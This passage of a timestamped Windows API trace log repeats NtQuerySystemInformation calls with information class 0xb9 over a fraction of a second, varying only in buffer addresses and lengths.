(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd940, Length=0x38, ResultLength=0x0) [0234.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd7d0, Length=0x20, ResultLength=0x0) [0234.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd760, Length=0x20, ResultLength=0x0) [0234.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd760, Length=0x20, ResultLength=0x0) [0234.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffda68, Length=0x58, ResultLength=0x0) [0234.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd930, Length=0x58, ResultLength=0x0) [0234.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd850, Length=0x38, ResultLength=0x0) [0234.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd680, Length=0x28, ResultLength=0x0) [0234.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd680, Length=0x28, ResultLength=0x0) [0234.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd680, Length=0x28, ResultLength=0x0) [0234.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd680, Length=0x28, ResultLength=0x0) [0234.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd6f0, Length=0x28, ResultLength=0x0) [0234.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd850, Length=0x38, ResultLength=0x0) [0234.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd770, Length=0x28, ResultLength=0x0) [0234.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd770, Length=0x28, ResultLength=0x0) [0234.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd850, Length=0x38, ResultLength=0x0) [0234.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd6d0, Length=0x20, ResultLength=0x0) [0234.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd650, Length=0x20, ResultLength=0x0) [0234.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd650, Length=0x20, ResultLength=0x0) [0234.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd650, Length=0x20, ResultLength=0x0) [0234.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd850, Length=0x38, ResultLength=0x0) [0234.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd6d0, Length=0x20, ResultLength=0x0) [0234.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd660, Length=0x20, ResultLength=0x0) [0234.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd660, Length=0x20, ResultLength=0x0) [0234.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd930, Length=0x58, ResultLength=0x0) [0234.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd850, Length=0x38, ResultLength=0x0) [0234.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd680, Length=0x28, ResultLength=0x0) [0234.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd680, Length=0x28, ResultLength=0x0) [0234.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd680, Length=0x28, ResultLength=0x0) [0234.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd680, Length=0x28, ResultLength=0x0) [0234.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd6f0, Length=0x28, ResultLength=0x0) [0234.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd850, Length=0x38, ResultLength=0x0) [0234.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd770, Length=0x28, ResultLength=0x0) [0234.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd770, Length=0x28, ResultLength=0x0) [0234.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd610, Length=0x20, ResultLength=0x0) [0234.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd590, Length=0x20, ResultLength=0x0) [0234.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd590, Length=0x20, ResultLength=0x0) [0234.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd590, Length=0x20, ResultLength=0x0) [0234.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd850, Length=0x38, ResultLength=0x0) [0234.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd850, Length=0x38, ResultLength=0x0) [0234.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd6d0, Length=0x20, ResultLength=0x0) [0234.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd660, Length=0x20, ResultLength=0x0) [0234.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd660, Length=0x20, ResultLength=0x0) [0234.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd930, Length=0x58, ResultLength=0x0) [0234.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd850, Length=0x38, ResultLength=0x0) [0234.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd680, Length=0x28, ResultLength=0x0) [0234.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd680, Length=0x28, ResultLength=0x0) [0234.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd680, Length=0x28, ResultLength=0x0) [0234.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd680, Length=0x28, ResultLength=0x0) [0234.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd6f0, Length=0x28, ResultLength=0x0) [0234.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd850, Length=0x38, ResultLength=0x0) [0234.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd770, Length=0x28, ResultLength=0x0) [0234.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd770, Length=0x28, ResultLength=0x0) [0234.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd850, Length=0x38, ResultLength=0x0) [0234.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd6d0, Length=0x20, ResultLength=0x0) [0234.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd650, Length=0x20, ResultLength=0x0) [0234.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd650, Length=0x20, ResultLength=0x0) [0234.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd650, Length=0x20, ResultLength=0x0) [0234.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd850, Length=0x38, ResultLength=0x0) [0234.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd6d0, Length=0x20, ResultLength=0x0) [0234.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd660, Length=0x20, ResultLength=0x0) [0234.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd660, Length=0x20, ResultLength=0x0) [0234.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd930, Length=0x58, ResultLength=0x0) [0234.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.351] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd810, Length=0x38, ResultLength=0x0) [0234.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd650, Length=0x28, ResultLength=0x0) [0234.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd650, Length=0x28, ResultLength=0x0) [0234.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd650, Length=0x28, ResultLength=0x0) [0234.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd650, Length=0x28, ResultLength=0x0) [0234.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd6c0, Length=0x28, ResultLength=0x0) [0234.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd810, Length=0x38, ResultLength=0x0) [0234.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd810, Length=0x38, ResultLength=0x0) [0234.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd740, Length=0x28, ResultLength=0x0) [0234.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd740, Length=0x28, ResultLength=0x0) [0234.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd810, Length=0x38, ResultLength=0x0) [0234.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd810, Length=0x38, ResultLength=0x0) [0234.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd5b0, Length=0x20, ResultLength=0x0) [0234.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd530, Length=0x20, ResultLength=0x0) [0234.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd530, Length=0x20, ResultLength=0x0) [0234.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd530, Length=0x20, ResultLength=0x0) [0234.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd780, Length=0x20, ResultLength=0x0) [0234.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd810, Length=0x38, ResultLength=0x0) [0234.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd6a0, Length=0x20, ResultLength=0x0) [0234.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd620, Length=0x20, ResultLength=0x0) [0234.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd620, Length=0x20, ResultLength=0x0) [0234.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd620, Length=0x20, ResultLength=0x0) [0234.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0234.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd810, Length=0x38, ResultLength=0x0) [0234.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffd6a0, Length=0x20, ResultLength=0x0) [0234.362] NtQuerySystemInformation (SystemInformationClass=0xb9, 